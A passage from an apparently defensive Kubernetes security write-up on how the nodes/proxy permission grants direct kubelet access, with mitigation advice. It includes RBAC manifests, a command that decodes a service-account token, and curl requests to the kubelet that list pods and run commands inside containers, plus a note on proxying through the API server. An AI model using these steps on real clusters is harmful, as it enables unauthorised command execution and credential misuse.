of their rights. 63 | - Consideration should be given to firewalling the kubelet port to white-listed addresses only (typically the API server and any other service which uses direct kubelet access (e.g. prometheus)), which could mitigate the direct access, although not the access via the API server 64 | - Additional logging (e.g. CRI, verbose kubelet logs) could be useful to audit this access. 65 | 66 | 67 | ## Demonstrating direct Kubelet access with node/proxy 68 | 69 | Here's a set of manifests that can be used to demonstrate the issue.
Create the three manifests in a cluster of your choosing (where you can reach the kubelet port at a network level) 70 | 71 | **ServiceAccount** 72 | ```yaml 73 | apiVersion: v1 74 | kind: ServiceAccount 75 | metadata: 76 | creationTimestamp: "2022-01-07T11:51:27Z" 77 | name: nodeproxy 78 | namespace: default 79 | ``` 80 | 81 | **ClusterRole** 82 | ```yaml 83 | apiVersion: rbac.authorization.k8s.io/v1 84 | kind: ClusterRole 85 | metadata: 86 | name: nodeproxy 87 | rules: 88 | - apiGroups: 89 | - "" 90 | resources: 91 | - nodes 92 | - nodes/proxy 93 | verbs: 94 | - get 95 | - create 96 | ``` 97 | 98 | **ClusterRoleBinding** 99 | ```yaml 100 | apiVersion: rbac.authorization.k8s.io/v1 101 | kind: ClusterRoleBinding 102 | metadata: 103 | name: nodeproxybinding 104 | roleRef: 105 | apiGroup: rbac.authorization.k8s.io 106 | kind: ClusterRole 107 | name: nodeproxy 108 | subjects: 109 | - kind: ServiceAccount 110 | name: nodeproxy 111 | namespace: default 112 | ``` 113 | 114 | Then get the service account token and decode it (change the secret name below to match what got created in your cluster) 115 | 116 | ```shell 117 | kubectl get secrets nodeproxy-token-8hg5r -o jsonpath={.data.token} | base64 -d 118 | ``` 119 | 120 | Then you can use curl with that token to get the pod listing (add the token where it says TOKEN below) 121 | 122 | ```shell 123 | curl -k -H "Authorization: Bearer TOKEN" https://192.168.41.77:10250/pods 124 | ``` 125 | 126 | And if you want to, you can execute commands in the containers with the general form below. Replace TOKEN with your secret value, NAMESPACE with the namespace of the pod, POD with the pod name and CONTAINER with the container name 127 | 128 | 129 | ```shell 130 | curl -k -H "Authorization: Bearer TOKEN" -XPOST https://192.168.41.77:10250/run/NAMESPACE/POD/CONTAINER -d "cmd=whoami" 131 | ``` 132 | 133 | ## Related Issues 134 | 135 | There's another, related, issue with the pod proxy that [Kinvolk found in 2019](https://kinvolk.io/blog/2019/02/abusing-kubernetes-api-server-proxying/). This essentially showed that you could use the API server proxy to send traffic to arbitrary IP addresses via the API server, by repeatedly changing a pod's IP address. Testing this shows it still works today. --------------------------------------------------------------------------------
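For reference, the shape of that pod proxy request follows the same pattern as the node proxy examples above, just using the pod subresource. A minimal sketch, where the namespace, pod name and port are placeholders rather than anything from the original write-up:

```shell
# With kubectl proxy running locally (as in the earlier examples), the API server
# opens the connection to whatever IP the pod currently reports in its status.
# "default", "target-pod" and "8080" below are placeholder values.
kubectl proxy &
curl "http://127.0.0.1:8001/api/v1/namespaces/default/pods/target-pod:8080/proxy/"
# The target sees the connection coming from the API server, not from the client
# machine running curl, which is what makes the Kinvolk technique interesting.
```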